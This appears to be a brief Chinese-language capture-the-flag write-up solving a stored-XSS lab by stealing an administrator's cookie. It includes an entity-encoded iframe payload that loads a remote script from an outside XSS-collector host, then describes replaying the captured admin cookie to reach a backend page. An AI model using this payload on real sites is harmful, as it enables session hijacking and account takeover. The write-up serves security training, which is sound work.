BUU XSS COURSE 1

BUU XSS COURSE 1"/>

BUU XSS COURSE 1

根据题目可知，这是一道xss题

打开如图所示

 我们在吐槽框中输入1可以发现可以显示出来；

输入一个简单的xss代码

<script>alert(1)</script>

我们发现回显不出来

由此可知，这是存储型xss。

因为靶机没法访问外网，我们可以利用内网xss平台，

例如.php?do=login

先创建一个项目，然后把内容选上，然后把payload写进吐槽框，然后上传；

payload：

<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。&#x3C;&#x73;&#x43;&#x52;&#x69;&#x50;&#x74;&#x20;&#x73;&#x52;&#x43;&#x3D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x73;&#x3A;&#x2F;&#x2F;&#x69;&#x30;&#x2E;&#x61;&#x6C;&#x2F;&#x4F;&#x39;&#x55;&#x50;&#x49;&#x33;&#x22;&#x3E;&#x3C;&#x2F;&#x73;&#x43;&#x72;&#x49;&#x70;&#x54;&#x3E;>

在xss平台我们可以看到有一个admin的访问记录，利用管理员的cookie，以及来访地址，去访问url

http://xxxxxxxxxxxxxxxxxxxxxxxxxx/backend/admin.php

 根据提示

 我们换取admin的cookie

 flag就出来了